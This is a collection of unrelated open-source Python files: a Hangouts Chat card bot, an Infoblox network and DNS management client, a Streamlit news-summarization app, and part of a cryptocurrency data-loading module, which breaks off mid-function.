https://developers.google.com/hangouts/chat/reference/message-formats/cards
Args:
eventMessage: the user's message to the bot
"""
response = dict()
cards = list()
widgets = list()
header = None
words = event_message.lower().split()
for word in words:
if word == 'header':
header = {
'header': {
'title': BOT_HEADER,
'subtitle': 'Card header',
'imageUrl': 'https://goo.gl/5obRKj',
'imageStyle': 'IMAGE'
}
}
elif word == 'textparagraph':
widgets.append({
'textParagraph' : {
'text': '<b>This</b> is a <i>text paragraph</i>.'
}
})
elif word == 'keyvalue':
widgets.append({
'keyValue': {
'topLabel': 'KeyValue Widget',
'content': 'This is a KeyValue widget',
'bottomLabel': 'The bottom label',
'icon': 'STAR'
}
})
elif word == 'interactivetextbutton':
widgets.append({
'buttons': [
{
'textButton': {
'text': 'INTERACTIVE BUTTON',
'onClick': {
'action': {
'actionMethodName': INTERACTIVE_TEXT_BUTTON_ACTION,
'parameters': [{
'key': INTERACTIVE_BUTTON_PARAMETER_KEY,
'value': event_message
}]
}
}
}
}
]
})
elif word == 'interactiveimagebutton':
widgets.append({
'buttons': [
{
'imageButton': {
'icon': 'EVENT_SEAT',
'onClick': {
'action': {
'actionMethodName': INTERACTIVE_IMAGE_BUTTON_ACTION,
'parameters': [{
'key': INTERACTIVE_BUTTON_PARAMETER_KEY,
'value': event_message
}]
}
}
}
}
]
})
elif word == 'textbutton':
widgets.append({
'buttons': [
{
'textButton': {
'text': 'TEXT BUTTON',
'onClick': {
'openLink': {
'url': 'https://developers.google.com',
}
}
}
}
]
})
elif word == 'imagebutton':
widgets.append({
'buttons': [
{
'imageButton': {
'icon': 'EVENT_SEAT',
'onClick': {
'openLink': {
'url': 'https://developers.google.com',
}
}
}
}
]
})
elif word == 'image':
widgets.append({
'image': {
'imageUrl': 'https://goo.gl/Bpa3Y5',
'onClick': {
'openLink': {
'url': 'https://developers.google.com'
}
}
}
})
if header != None:
cards.append(header)
cards.append({ 'sections': [{ 'widgets': widgets }]})
response['cards'] = cards
return response
def respond_to_interactive_card_click(action_name, custom_params):
"""Creates a response for when the user clicks on an interactive card.
See the guide for creating interactive cards
https://developers.google.com/hangouts/chat/how-tos/cards-onclick
Args:
action_name: the name of the custom action defined in the original bot response
custom_params: the parameters defined in the original bot response
"""
message = 'You clicked {}'.format(
'a text button' if action_name == INTERACTIVE_TEXT_BUTTON_ACTION
else 'an image button')
original_message = ""
if custom_params[0]['key'] == INTERACTIVE_BUTTON_PARAMETER_KEY:
original_message = custom_params[0]['value']
else:
original_message = '<i>Cannot determine original message</i>'
# If you want to respond to the same room but with a new message,
# change the following value to NEW_MESSAGE.
action_response = 'UPDATE_MESSAGE'
return {
'actionResponse': {
'type': action_response
},
'cards': [
{
'header': {
'title': BOT_HEADER,
'subtitle': 'Interactive card clicked',
'imageUrl': 'https://goo.gl/5obRKj',
'imageStyle': 'IMAGE'
}
},
{
'sections': [
{
'widgets': [
{
'textParagraph': {
'text': message
}
},
{
'keyValue': {
'topLabel': 'Original message',
'content': original_message
}
}
]
}
]
}
]
}
|
the-stack_106_19146
|
# Copyright 2015 Infoblox Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
try:
from oslo_log import log as logging
except ImportError: # pragma: no cover
import logging
from infoblox_client import exceptions as ib_ex
from infoblox_client import objects as obj
from infoblox_client import utils as ib_utils
LOG = logging.getLogger(__name__)
class InfobloxObjectManager(object):
def __init__(self, connector):
self.connector = connector
def create_network_view(self, network_view, extattrs):
return obj.NetworkView.create(self.connector,
name=network_view,
extattrs=extattrs)
def delete_network_view(self, network_view):
# never delete default network view
if network_view == 'default':
return
nview = obj.NetworkView.search(self.connector,
name=network_view)
if nview:
nview.delete()
def create_dns_view(self, network_view, dns_view):
return obj.DNSView.create(self.connector,
name=dns_view,
network_view=network_view)
def delete_dns_view(self, dns_view):
dns_view = obj.DNSView.search(self.connector,
name=dns_view)
if dns_view:
dns_view.delete()
def create_network(self, net_view_name, cidr, nameservers=None,
members=None, gateway_ip=None, dhcp_trel_ip=None,
network_extattrs=None):
"""Create NIOS Network and prepare DHCP options.
Some DHCP options are valid for IPv4 only, so just skip processing
them for IPv6 case.
:param net_view_name: network view name
:param cidr: network to allocate, example '172.23.23.0/24'
:param nameservers: list of name servers hosts/ip
:param members: list of objects.AnyMember objects that are expected
to serve dhcp for created network
:param gateway_ip: gateway ip for the network (valid for IPv4 only)
:param dhcp_trel_ip: ip address of dhcp relay (valid for IPv4 only)
:param network_extattrs: extensible attributes for network (instance of
objects.EA)
:returns: created network (instance of objects.Network)
"""
ipv4 = ib_utils.determine_ip_version(cidr) == 4
options = []
if nameservers:
options.append(obj.DhcpOption(name='domain-name-servers',
value=",".join(nameservers)))
if ipv4 and gateway_ip:
options.append(obj.DhcpOption(name='routers',
value=gateway_ip))
if ipv4 and dhcp_trel_ip:
options.append(obj.DhcpOption(name='dhcp-server-identifier',
num=54,
value=dhcp_trel_ip))
return obj.Network.create(self.connector,
network_view=net_view_name,
cidr=cidr,
members=members,
options=options,
extattrs=network_extattrs,
check_if_exists=False)
def get_network(self, network_view, cidr):
return obj.Network.search(self.connector,
network_view=network_view,
cidr=cidr)
def create_ip_range(self, network_view, start_ip, end_ip, network,
disable, range_extattrs):
"""Creates IPRange or fails if already exists."""
return obj.IPRange.create(self.connector,
network_view=network_view,
start_addr=start_ip,
end_addr=end_ip,
cidr=network,
disable=disable,
extattrs=range_extattrs,
check_if_exists=False)
def delete_ip_range(self, network_view, start_ip, end_ip):
range = obj.IPRange.search(self.connector,
network_view=network_view,
start_addr=start_ip,
end_addr=end_ip)
if range:
range.delete()
def has_networks(self, network_view_name):
networks = obj.Network.search_all(self.connector,
network_view=network_view_name)
return bool(networks)
def network_exists(self, network_view, cidr):
"""Deprecated, use get_network() instead."""
LOG.warning(
"DEPRECATION WARNING! Using network_exists() is deprecated "
"and to be removed in next releases. "
"Use get_network() or objects.Network.search instead")
network = obj.Network.search(self.connector,
network_view=network_view,
cidr=cidr)
return network is not None
def delete_network(self, network_view, cidr):
network = obj.Network.search(self.connector,
network_view=network_view,
cidr=cidr)
if network:
network.delete()
def create_network_from_template(self, network_view, cidr, template,
extattrs):
return obj.Network.create(self.connector,
network_view=network_view,
cidr=cidr,
template=template,
extattrs=extattrs,
check_if_exists=False)
def update_network_options(self, ib_network, extattrs=None):
if extattrs:
if ib_network.extattrs:
# Merge EA values as dicts
ea_dict = ib_network.extattrs.ea_dict
ea_dict.update(extattrs.ea_dict)
merged_ea = obj.EA(ea_dict)
ib_network.extattrs = merged_ea
else:
ib_network.extattrs = extattrs
return ib_network.update()
def get_host_record(self, dns_view, ip, network_view=None):
return obj.HostRecord.search(self.connector,
view=dns_view,
ip=ip,
network_view=network_view)
def find_hostname(self, dns_view, hostname, ip, network_view=None):
return obj.HostRecord.search(self.connector,
name=hostname,
view=dns_view,
ip=ip,
network_view=network_view)
def find_host_records_by_mac(self, dns_view, mac, network_view=None):
host_records = []
host_records.extend(obj.HostRecord.search_all(
self.connector, view=dns_view, mac=mac, network_view=network_view))
# Unfortunately WAPI does not support search host records by DUID, so
# search host addresses by duid and then search hosts by name
ipv6_host_addresses = obj.IPv6HostAddress.search_all(
self.connector, duid=mac, network_view=network_view)
ipv6_hosts = []
for addr in ipv6_host_addresses:
hosts = obj.HostRecordV6.search_all(
self.connector, name=addr.host, view=dns_view,
network_view=network_view)
for host in hosts:
if host not in ipv6_hosts:
ipv6_hosts.append(host)
host_records.extend(ipv6_hosts)
return host_records
def create_host_record_for_given_ip(self, dns_view, zone_auth,
hostname, mac, ip, extattrs,
use_dhcp, use_dns=True):
name = '.'.join([hostname, zone_auth])
ip_obj = obj.IP.create(ip=ip, mac=mac, configure_for_dhcp=use_dhcp)
return obj.HostRecord.create(self.connector,
view=dns_view,
name=name,
ip=ip_obj,
configure_for_dns=use_dns,
extattrs=extattrs,
check_if_exists=False)
def create_host_record_from_range(self, dns_view, network_view_name,
zone_auth, hostname, mac, first_ip,
last_ip, extattrs, use_dhcp,
use_dns=True):
name = '.'.join([hostname, zone_auth])
ip_alloc = obj.IPAllocation.next_available_ip_from_range(
network_view_name, first_ip, last_ip)
ip_obj = obj.IP.create(ip=ip_alloc, mac=mac,
configure_for_dhcp=use_dhcp)
return obj.HostRecord.create(self.connector,
view=dns_view,
name=name,
ip=ip_obj,
configure_for_dns=use_dns,
extattrs=extattrs,
check_if_exists=False)
def delete_host_record(self, dns_view, ip_address, network_view=None):
host_record = obj.HostRecord.search(self.connector,
view=dns_view, ip=ip_address,
network_view=network_view)
if host_record:
host_record.delete()
def create_fixed_address_for_given_ip(self, network_view, mac, ip,
extattrs):
return obj.FixedAddress.create(self.connector,
network_view=network_view,
mac=mac,
ip=ip,
extattrs=extattrs,
check_if_exists=False)
def create_fixed_address_from_range(self, network_view, mac, first_ip,
last_ip, extattrs):
ip = obj.IPAllocation.next_available_ip_from_range(
network_view, first_ip, last_ip)
return obj.FixedAddress.create(self.connector,
ip=ip,
mac=mac,
network_view=network_view,
extattrs=extattrs,
check_if_exists=False)
def create_fixed_address_from_cidr(self, netview, mac, cidr, extattrs):
ip = obj.IPAllocation.next_available_ip_from_cidr(netview, cidr)
return obj.FixedAddress.create(self.connector,
network_view=netview,
ip=ip,
mac=mac,
extattrs=extattrs,
check_if_exists=False)
def delete_fixed_address(self, network_view, ip_address):
fixed_address = obj.FixedAddress.search(self.connector,
network_view=network_view,
ip=ip_address)
if fixed_address:
fixed_address.delete()
def get_fixed_addresses_by_mac(self, network_view, mac):
return obj.FixedAddress.search_all(
self.connector, network_view=network_view, mac=mac)
def add_ip_to_record(self, host_record, ip, mac, use_dhcp=True):
ip_obj = obj.IP.create(ip=ip, mac=mac, configure_for_dhcp=use_dhcp)
host_record.ip.append(ip_obj)
return host_record.update()
def add_ip_to_host_record_from_range(self, host_record, network_view,
mac, first_ip, last_ip,
use_dhcp=True):
ip_alloc = obj.IPAllocation.next_available_ip_from_range(
network_view, first_ip, last_ip)
ip_obj = obj.IP.create(ip=ip_alloc, mac=mac,
configure_for_dhcp=use_dhcp)
host_record.ip.append(ip_obj)
return host_record.update()
def delete_ip_from_host_record(self, host_record, ip):
host_record.ip.remove(ip)
return host_record.update()
def has_dns_zones(self, dns_view):
zones = obj.DNSZone.search_all(self.connector, view=dns_view)
return bool(zones)
def create_dns_zone(self, dns_view, dns_zone,
grid_primary=None, grid_secondaries=None,
zone_format=None, ns_group=None, prefix=None,
extattrs=None):
return obj.DNSZone.create(self.connector,
fqdn=dns_zone,
view=dns_view,
extattrs=extattrs,
zone_format=zone_format,
ns_group=ns_group,
prefix=prefix,
grid_primary=grid_primary,
grid_secondaries=grid_secondaries)
def delete_dns_zone(self, dns_view, dns_zone_fqdn):
dns_zone = obj.DNSZone.search(self.connector,
fqdn=dns_zone_fqdn,
view=dns_view)
if dns_zone:
dns_zone.delete()
def update_dns_zone_attrs(self, dns_view, dns_zone_fqdn, extattrs):
if not extattrs:
return
dns_zone = obj.DNSZone.search(self.connector,
fqdn=dns_zone_fqdn,
view=dns_view)
if dns_zone:
dns_zone.extattrs = extattrs
dns_zone.update()
def update_host_record_eas(self, dns_view, ip, extattrs):
host_record = obj.HostRecord.search(self.connector,
view=dns_view,
ip=ip)
if host_record:
host_record.extattrs = extattrs
host_record.update()
def update_fixed_address_eas(self, network_view, ip, extattrs):
fixed_address = obj.FixedAddress.search(self.connector,
network_view=network_view,
ip=ip)
if fixed_address:
fixed_address.extattrs = extattrs
fixed_address.update()
def update_dns_record_eas(self, dns_view, ip, extattrs):
a_record = obj.ARecordBase.search(self.connector,
ip=ip,
view=dns_view)
if a_record:
a_record.extattrs = extattrs
a_record.update()
ptr_record = obj.PtrRecord.search(self.connector,
ip=ip,
view=dns_view)
if ptr_record:
ptr_record.extattrs = extattrs
ptr_record.update()
def bind_name_with_host_record(self, dns_view, ip, name, extattrs,
network_view=None):
host_record = obj.HostRecord.search(self.connector,
view=dns_view,
ip=ip,
network_view=network_view)
if host_record:
host_record.name = name
host_record.extattrs = extattrs
host_record.update()
def bind_name_with_record_a(self, dns_view, ip, name, bind_list,
extattrs):
is_ipv4 = ib_utils.determine_ip_version(ip) == 4
if ((is_ipv4 and 'record:a' in bind_list) or
(not is_ipv4 and 'record:aaaa' in bind_list)):
obj.ARecordBase.create(self.connector,
view=dns_view,
ip=ip,
name=name,
extattrs=extattrs,
update_if_exists=True)
if 'record:ptr' in bind_list:
obj.PtrRecord.create(self.connector,
view=dns_view,
ip=ip,
ptrdname=name,
extattrs=extattrs,
update_if_exists=True)
def unbind_name_from_record_a(self, dns_view, ip, name, unbind_list):
is_ipv4 = ib_utils.determine_ip_version(ip) == 4
if ((is_ipv4 and 'record:a' in unbind_list) or
(not is_ipv4 and 'record:aaaa' in unbind_list)):
a_record = obj.ARecordBase.search(self.connector,
view=dns_view,
ip=ip,
name=name)
if a_record:
self.delete_objects_associated_with_a_record(a_record.name,
a_record.view,
unbind_list)
a_record.delete()
if 'record:ptr' in unbind_list:
ptr_record = obj.PtrRecord.search(self.connector,
view=dns_view,
ip=ip,
ptrdname=name)
if ptr_record:
ptr_record.delete()
def get_member(self, member):
member.fetch()
return member
def get_all_ea_definitions(self):
return obj.EADefinition.search_all(self.connector)
def create_ea_definition(self, ea_def, reraise=False):
try:
return obj.EADefinition.create(self.connector,
check_if_exists=False,
**ea_def)
except ib_ex.InfobloxCannotCreateObject:
LOG.error('Unable to create Extensible Attribute Definition '
'%s' % ea_def)
if reraise:
raise
def create_required_ea_definitions(self, required_ea_defs, reraise=False):
existing_ea_defs = self.get_all_ea_definitions()
missing_ea_defs = []
for req_def in required_ea_defs:
if not [ea_def for ea_def in existing_ea_defs
if ea_def.name == req_def['name']]:
missing_ea_defs.append(req_def)
created_ea_defs = []
for ea_def in missing_ea_defs:
if self.create_ea_definition(ea_def, reraise=reraise):
created_ea_defs.append(ea_def)
return created_ea_defs
def restart_all_services(self, member):
if not member._ref:
member.fetch(only_ref=True)
self.connector.call_func('restartservices', member._ref,
{'restart_option': 'RESTART_IF_NEEDED',
'service_option': 'ALL'})
def delete_objects_associated_with_a_record(self, name, view, delete_list):
"""Deletes records associated with record:a or record:aaaa."""
search_objects = {}
if 'record:cname' in delete_list:
search_objects['record:cname'] = 'canonical'
if 'record:txt' in delete_list:
search_objects['record:txt'] = 'name'
if not search_objects:
return
for obj_type, search_type in search_objects.items():
payload = {'view': view,
search_type: name}
ib_objs = self.connector.get_object(obj_type, payload)
if ib_objs:
for ib_obj in ib_objs:
self.delete_object_by_ref(ib_obj['_ref'])
def delete_all_associated_objects(self, network_view, ip, delete_list):
LOG.warning(
"DEPRECATION WARNING! Using delete_all_associated_objects() "
"is deprecated and to be removed in next releases. "
"Use unbind_name_from_record_a() instead.")
def delete_object_by_ref(self, ref):
try:
self.connector.delete_object(ref)
except ib_ex.InfobloxCannotDeleteObject:
pass
|
the-stack_106_19150
|
import streamlit as st
from helper import get_summary, spacy_rander, fetch_news, fetch_news_links
st.set_page_config(
page_title="Data Analysis Web App",
page_icon="🧊",
layout="wide",
initial_sidebar_state="expanded",
menu_items={
'Get Help': 'https://github.com/everydaycodings/Text-Summarization-using-NLP',
'Report a bug': "https://github.com/everydaycodings/Text-Summarization-using-NLP/issues/new",
'About': "# This is a header. This is an *extremely* cool app!"
}
)
st.sidebar.title("Text Summarization Web App")
option = ["News Summary and Headlines", "Custom Text Summarization"]
choice = st.sidebar.selectbox("Select of your choice", options=option)
if choice == "Custom Text Summarization":
st.sidebar.markdown("Copy Sample Article if you want to test the web app. [[article source](https://edition.cnn.com/2022/02/14/us/new-mexico-albuquerque-stabbings/index.html)]")
st.sidebar.code(open("presentation/sample.txt","r").read())
st.title("Welcome to {}".format(choice))
col1, col2 = st.columns(2)
with col1:
text = st.text_area(label="Enter Your Text or story", height=350, placeholder="Enter Your Text or story or your article iit can be of any length")
if st.button("Get Summary and Headline"):
summary = get_summary(text)
try:
with col2:
st.write("Text Summary (Summary length: {})".format(len(summary)))
st.code(summary)
st.write("Text Headline")
st.code("Feature Comming Soon")
spacy_rander(summary)
#with st.expander("Get Original Article Analysis"):
spacy_rander(text, text="Yes")
except NameError:
pass
if choice == "News Summary and Headlines":
st.title("BBC News Summary")
search_query = st.text_input("", placeholder="Enter the topic you want to search")
st.write(" ")
link, title, thumbnail = fetch_news_links(search_query)
fetch_news = fetch_news(link)
if link != []:
col1, col2 = st.columns(2)
with col1:
for i in range(len(link)):
if (i % 2) == 0:
st.image(thumbnail[i])
st.write(title[i])
with st.expander("Read The Summary"):
st.write(get_summary(fetch_news[i]))
st.markdown("[**Read Full Article**]({})".format(link[i]), unsafe_allow_html=True)
st.write(" ")
with col2:
for i in range(len(link)):
if (i % 2) != 0:
st.image(thumbnail[i])
st.write(title[i])
with st.expander("Read The Summary"):
st.write(get_summary(fetch_news[i]))
st.markdown("[**Read Full Article**]({})".format(link[i]), unsafe_allow_html=True)
st.write(" ")
else:
st.info("No Result found for {} Please try some popular Keywords".format(search_query))
|
the-stack_106_19151
|
"""Cryptocurrency helpers"""
__docformat__ = "numpy"
# pylint: disable=C0301,R0911,C0302
import os
import json
from typing import Tuple, Any, Optional, List
import difflib
import logging
import pandas as pd
import numpy as np
from binance.client import Client
import matplotlib.pyplot as plt
import mplfinance as mpf
from pycoingecko import CoinGeckoAPI
from gamestonk_terminal.helper_funcs import (
plot_autoscale,
export_data,
print_rich_table,
)
from gamestonk_terminal.config_plot import PLOT_DPI
from gamestonk_terminal.cryptocurrency.due_diligence import (
pycoingecko_model,
coinpaprika_model,
)
from gamestonk_terminal.cryptocurrency.discovery.pycoingecko_model import get_coin_list
from gamestonk_terminal.cryptocurrency.overview.coinpaprika_model import (
get_list_of_coins,
)
from gamestonk_terminal.cryptocurrency.due_diligence.binance_model import (
check_valid_binance_str,
show_available_pairs_for_given_symbol,
)
from gamestonk_terminal.config_terminal import theme
from gamestonk_terminal.cryptocurrency.due_diligence import coinbase_model
import gamestonk_terminal.config_terminal as cfg
from gamestonk_terminal.rich_config import console
logger = logging.getLogger(__name__)
INTERVALS = ["1H", "3H", "6H", "1D"]
SOURCES_INTERVALS = {
"bin": [
"1day",
"3day",
"1hour",
"2hour",
"4hour",
"6hour",
"8hour",
"12hour",
"1week",
"1min",
"3min",
"5min",
"15min",
"30min",
"1month",
],
"cb": [
"1min",
"5min",
"15min",
"1hour",
"6hour",
"24hour",
"1day",
],
}
def load_cg_coin_data(
coin: str, currency: str = "USD", days: int = 365, sampling: str = "1D"
) -> pd.DataFrame:
"""Load cryptocurrency data from CoinGecko
Timestamps from CoinGecko are not uniform, so the sampling is included to provide ohlc bars.
Note that for days > 90, daily data is returned as prices only. Less than 90 days returns hourly data
which can be consolidated into OHLC
Parameters
----------
coin : str
Cryptocurrency to load
currency : str, optional
Conversion unit, by default "USD"
days : int, optional
Number of days to get, by default 365
sampling : str, optional
Time period to resample in the format in the format #U where U can be H (hour) or D(day), by default "1D"
Returns
-------
pd.DataFrame
DataFrame of OHLC
"""
prices = CoinGeckoAPI().get_coin_market_chart_by_id(coin, currency, days)
df = pd.DataFrame(data=prices["prices"], columns=["time", "price"])
df["time"] = pd.to_datetime(df.time, unit="ms")
df = df.set_index("time")
if days > 90:
sampling = "1D"
df = df.resample(sampling).ohlc()
df.columns = ["Open", "High", "Low", "Close"]
return df
def _load_coin_map(file_name: str) -> pd.DataFrame:
if file_name.split(".")[1] != "json":
raise TypeError("Please load json file")
current_dir = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(current_dir, "data", file_name)
with open(path, encoding="utf8") as f:
coins = json.load(f)
coins_df = pd.Series(coins).reset_index()
coins_df.columns = ["symbol", "id"]
return coins_df
def read_data_file(file_name: str):
if file_name.split(".")[1] != "json":
raise TypeError("Please load json file")
current_dir = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(current_dir, "data", file_name)
with open(path, encoding="utf8") as f:
return json.load(f)
def load_coins_list(file_name: str, return_raw: bool = False) -> pd.DataFrame:
if file_name.split(".")[1] != "json":
raise TypeError("Please load json file")
current_dir = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(current_dir, "data", file_name)
with open(path, encoding="utf8") as f:
coins = json.load(f)
if return_raw:
return coins
return pd.DataFrame(coins)
def load_binance_map():
return _load_coin_map("binance_gecko_map.json")
def load_coinbase_map():
return _load_coin_map("coinbase_gecko_map.json")
def prepare_all_coins_df() -> pd.DataFrame:
"""Helper method which loads coins from all sources: CoinGecko, CoinPaprika, Binance
and merge those coins on keys:
CoinGecko - > name < - CoinPaprika
CoinGecko - > id <- Binance
Returns
-------
pd.DataFrame
CoinGecko - id for coin in CoinGecko API: uniswap
CoinPaprika - id for coin in CoinPaprika API: uni-uniswap
Binance - symbol (baseAsset) for coin in Binance API: UNI
Coinbase - symbol for coin in Coinbase Pro API e.g UNI
Symbol: uni
"""
gecko_coins_df = load_coins_list("coingecko_coins.json")
paprika_coins_df = load_coins_list("coinpaprika_coins.json")
paprika_coins_df = paprika_coins_df[paprika_coins_df["is_active"]]
paprika_coins_df = paprika_coins_df[["rank", "id", "name", "symbol", "type"]]
# TODO: Think about scheduled job, that once a day will update data
binance_coins_df = load_binance_map().rename(columns={"symbol": "Binance"})
coinbase_coins_df = load_coinbase_map().rename(columns={"symbol": "Coinbase"})
gecko_paprika_coins_df = pd.merge(
gecko_coins_df, paprika_coins_df, on="name", how="left"
)
df_merged = pd.merge(
left=gecko_paprika_coins_df,
right=binance_coins_df,
left_on="id_x",
right_on="id",
how="left",
)
df_merged.rename(
columns={
"id_x": "CoinGecko",
"symbol_x": "Symbol",
"id_y": "CoinPaprika",
},
inplace=True,
)
df_merged = pd.merge(
left=df_merged,
right=coinbase_coins_df,
left_on="CoinGecko",
right_on="id",
how="left",
)
return df_merged[["CoinGecko", "CoinPaprika", "Binance", "Coinbase", "Symbol"]]
def _create_closest_match_df(
coin: str, coins: pd.DataFrame, limit: int, cutoff: float
) -> pd.DataFrame:
"""Helper method. Creates a DataFrame with best matches for given coin found in given list of coins.
Based on difflib.get_close_matches func.
Parameters
----------
coin: str
coin you search for
coins: list
list of coins in which you want to find similarities
limit: int
limit of matches
cutoff: float
float between <0, 1>. Show only coins matches with score higher then cutoff.
Returns
-------
pd.DataFrame
index, id, name, symbol - > depends on source of data.
"""
coins_list = coins["id"].to_list()
sim = difflib.get_close_matches(coin, coins_list, limit, cutoff)
df = pd.Series(sim).to_frame().reset_index()
df.columns = ["index", "id"]
return df.merge(coins, on="id")
# TODO: verify vs, interval, days, depending on source
def load(
coin: str,
source: str = "cp",
days: int = 60,
vs: str = "usd",
interval: str = "1day",
should_load_ta_data: bool = False,
):
"""Load cryptocurrency from given source. Available sources are: CoinGecko, CoinPaprika, Coinbase and Binance.
Loading coin from Binance and CoinPaprika means validation if given coins exists in chosen source,
if yes then id of the coin is returned as a string.
In case of CoinGecko load will return Coin object, if provided coin exists. Coin object has access to different coin
information.
Parameters
----------
coin: str
Coin symbol or id which is checked if exists in chosen data source.
source : str
Source of the loaded data. CoinGecko, CoinPaprika, or Binance
Returns
-------
Tuple[Union[str, pycoingecko_model.Coin], str, str]
- str or Coin object for provided coin
- str with source of the loaded data. CoinGecko, CoinPaprika, or Binance
- str with symbol
- Dataframe with coin map to different sources
"""
if source in ("cg", "cp"):
if vs not in ("USD", "BTC", "usd", "btc"):
console.print("You can only compare with usd or btc (e.g., --vs usd)\n")
return None, None, None, None, None, None
if interval != "1day":
console.print(
"Only daily data is supported for coingecko and coinpaprika (e.g., -i 1day)\n"
)
return None, None, None, None, None, None
current_coin = "" # type: Optional[Any]
coins_map_df = prepare_all_coins_df().set_index("Symbol").dropna(thresh=2)
if source == "cg":
coingecko = pycoingecko_model.Coin(coin.lower(), True)
if not coingecko.symbol:
return None, None, None, None, None, None
coin_map_df = coins_map_df.loc[coingecko.symbol]
coin_map_df = (
coin_map_df.iloc[0]
if isinstance(coin_map_df, pd.DataFrame)
else coin_map_df
) # TODO: improve to choose the row that matches better;
# if it is dataframe, it means that found more than 1 coin
if should_load_ta_data:
df_prices, currency = load_ta_data(
coin_map_df=coin_map_df,
source=source,
currency=vs,
days=days,
limit=0,
interval=interval,
)
return (
str(coingecko),
source,
coingecko.symbol,
coin_map_df,
df_prices,
currency,
)
return (
str(coingecko),
source,
coingecko.symbol,
coin_map_df,
None,
None,
)
if source == "cp":
paprika_coins = get_list_of_coins()
paprika_coins_dict = dict(zip(paprika_coins.id, paprika_coins.symbol))
current_coin, symbol = coinpaprika_model.validate_coin(coin, paprika_coins_dict)
if not symbol:
return None, None, None, None, None, None
coin_map_df = coins_map_df.loc[symbol.lower() if symbol is not None else symbol]
coin_map_df = (
coin_map_df.iloc[0]
if isinstance(coin_map_df, pd.DataFrame)
else coin_map_df
)
if should_load_ta_data:
df_prices, currency = load_ta_data(
coin_map_df=coin_map_df,
source=source,
currency=vs,
days=days,
limit=0,
interval=interval,
)
return (current_coin, source, symbol, coin_map_df, df_prices, currency)
return (current_coin, source, symbol, coin_map_df, None, None)
if source == "bin":
if vs == "usd":
vs = "USDT"
if interval not in SOURCES_INTERVALS["bin"]:
console.print(
"Interval not available on binance. Run command again with one supported (e.g., -i 1day):\n",
SOURCES_INTERVALS["bin"],
)
return None, None, None, None, None, None
# TODO: convert bitcoin to btc before searching pairs
parsed_coin = coin.upper()
current_coin, pairs = show_available_pairs_for_given_symbol(parsed_coin)
if len(pairs) > 0:
if vs not in pairs:
console.print(
"vs specified not supported by binance. Run command again with one supported (e.g., --vs USDT):\n",
pairs,
)
return None, None, None, None, None, None
coin_map_df = coins_map_df.loc[parsed_coin.lower()]
coin_map_df = (
coin_map_df.iloc[0]
if isinstance(coin_map_df, pd.DataFrame)
else coin_map_df
)
# console.print(f"Coin found : {current_coin}\n")
if should_load_ta_data:
df_prices, currency = load_ta_data(
coin_map_df=coin_map_df,
source=source,
currency=vs,
days=0,
limit=days,
interval=interval,
)
return (
current_coin,
source,
parsed_coin,
coin_map_df,
df_prices,
currency,
)
return (current_coin, source, parsed_coin, coin_map_df, None, None)
return None, None, None, None, None, None
if source == "cb":
if vs == "usd":
vs = "USDT"
if interval not in SOURCES_INTERVALS["cb"]:
console.print(
"Interval not available on coinbase. Run command again with one supported (e.g., -i 1day):\n",
SOURCES_INTERVALS["cb"],
)
return None, None, None, None, None, None
# TODO: convert bitcoin to btc before searching pairs
coinbase_coin = coin.upper()
current_coin, pairs = coinbase_model.show_available_pairs_for_given_symbol(
coinbase_coin
)
if vs not in pairs:
console.print(
"vs specified not supported by coinbase. Run command again with one supported (e.g., --vs USDT):\n",
pairs,
)
return None, None, None, None, None, None
if len(pairs) > 0:
# console.print(f"Coin found : {current_coin}\n")
coin_map_df = coins_map_df.loc[coin]
coin_map_df = (
coin_map_df.iloc[0]
if isinstance(coin_map_df, pd.DataFrame)
else coin_map_df
)
if should_load_ta_data:
df_prices, currency = load_ta_data(
coin_map_df=coin_map_df,
source=source,
currency=vs,
days=0,
limit=days,
interval=interval,
)
return (current_coin, source, coin, coin_map_df, df_prices, currency)
return (current_coin, source, coin, coin_map_df, None, None)
console.print(f"Couldn't find coin with symbol {current_coin}\n")
return None, None, None, None, None, None
return None, None, None, None, None, None
FIND_KEYS = ["id", "symbol", "name"]
# TODO: Find better algorithm then difflib.get_close_matches to find most similar coins
def find(source: str, coin: str, key: str, top: int, export: str) -> None:
"""Find similar coin by coin name,symbol or id.
If you don't remember exact name or id of the Coin at CoinGecko CoinPaprika, Binance or Coinbase
you can use this command to display coins with similar name, symbol or id to your search query.
Example of usage: coin name is something like "polka". So I can try: find -c polka -k name -t 25
It will search for coin that has similar name to polka and display top 25 matches.
-c, --coin stands for coin - you provide here your search query
-k, --key it's a searching key. You can search by symbol, id or name of coin
-t, --top it displays top N number of records.
Parameters
----------
top: int
Number of records to display
coin: str
Cryptocurrency
key: str
Searching key (symbol, id, name)
source: str
Data source of coins. CoinGecko (cg) or CoinPaprika (cp) or Binance (bin), Coinbase (cb)
export : str
Export dataframe data to csv,json,xlsx file
"""
if source == "cg":
coins_df = get_coin_list()
coins_list = coins_df[key].to_list()
if key in ["symbol", "id"]:
coin = coin.lower()
sim = difflib.get_close_matches(coin, coins_list, top)
df = pd.Series(sim).to_frame().reset_index()
df.columns = ["index", key]
coins_df.drop("index", axis=1, inplace=True)
df = df.merge(coins_df, on=key)
elif source == "cp":
coins_df = get_list_of_coins()
coins_list = coins_df[key].to_list()
keys = {"name": "title", "symbol": "upper", "id": "lower"}
func_key = keys[key]
coin = getattr(coin, str(func_key))()
sim = difflib.get_close_matches(coin, coins_list, top)
df = pd.Series(sim).to_frame().reset_index()
df.columns = ["index", key]
df = df.merge(coins_df, on=key)
elif source == "bin":
# TODO: Fix it in future. Determine if user looks for symbol like ETH or ethereum
if len(coin) > 5:
key = "id"
coins_df_gecko = get_coin_list()
coins_df_bin = load_binance_map()
coins = pd.merge(
coins_df_bin, coins_df_gecko[["id", "name"]], how="left", on="id"
)
coins_list = coins[key].to_list()
sim = difflib.get_close_matches(coin, coins_list, top)
df = pd.Series(sim).to_frame().reset_index()
df.columns = ["index", key]
df = df.merge(coins, on=key)
elif source == "cb":
if len(coin) > 5:
key = "id"
coins_df_gecko = get_coin_list()
coins_df_bin = load_coinbase_map()
coins = pd.merge(
coins_df_bin, coins_df_gecko[["id", "name"]], how="left", on="id"
)
coins_list = coins[key].to_list()
